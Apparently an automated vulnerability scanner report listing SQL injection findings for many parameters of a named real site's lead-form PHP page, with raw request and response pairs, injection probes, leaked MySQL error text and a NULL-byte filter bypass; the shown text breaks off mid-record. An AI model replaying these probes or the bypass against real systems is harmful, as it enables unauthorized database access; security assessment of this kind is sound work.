HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 01:52:13 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=dndmtt7fuqrbshtl13mue26qo6; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>
The attributeId_424 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_424 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:00:37 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 6622 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'already have a list of addresses&attributeId_426=2768__500 - 4,999&attributeId_4' at line 5
The attributeId_425 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_425 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses'&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:52:13 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=vtk0nqnq6f4jleesejhgg63501; path=/ Content-Length: 7542 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '999&attributeId_427=2775__One-time campaign&attributeId_428=2779__Immediately&bu' at line 5
Request 2
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses''&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:52:14 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=1s57o6q1d1tiep3kdur8hbqn25; path=/ Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8
The attributeId_426 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_426 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999'&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:52:14 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=nos6j8soc6t3nsdeq0262lo6f2; path=/ Content-Length: 7542 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Na' at line 5
Request 2
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999''&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 01:52:15 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=qj3kfhck31vung0jpu1ll37pv4; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>
The attributeId_427 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_427 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign'&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:52:15 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=mf01fkubja0qdjhd4cbpeg89o3; path=/ Content-Length: 7542 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... campaign'&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5
Request 2
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign''&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 01:52:16 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=mii1ibhove6per37coafki9nh3; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>
The attributeId_428 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_428 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately'&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:52:17 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=gs5r57etgpptael4lvkf7ig0k2; path=/ Content-Length: 7542 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... campaign&attributeId_428=2779__Immediately'&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5
Request 2
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately''&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 01:52:17 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=91l9ud7s3d1bggt7sv0800v921; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>
The button3 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the button3 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:52:18 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=8i5n2lufivf1rmhj0feope34h5; path=/ Content-Length: 7542 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... campaign&attributeId_428=2779__Immediately&button3=Submit'&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5
Request 2
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit''&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 01:52:19 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=o7da6u3nsjltj3b9kkpd9dnr34; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>
The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)'&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:51:54 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=gfoij67bsuue9jipj1n0262lt6; path=/ Content-Length: 7542 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2749__Coupon&attributeId_424=2760__Design, print, and send&attributeId_425=27' at line 5
Request 2
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)''&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 01:51:54 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=6d84gst0ve848d25vq3c097431; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>
The companyname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the companyname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:52:25 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=glks59t1d43h7gugds5vh2usc5; path=/ Content-Length: 7542 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code' at line 5
Request 2
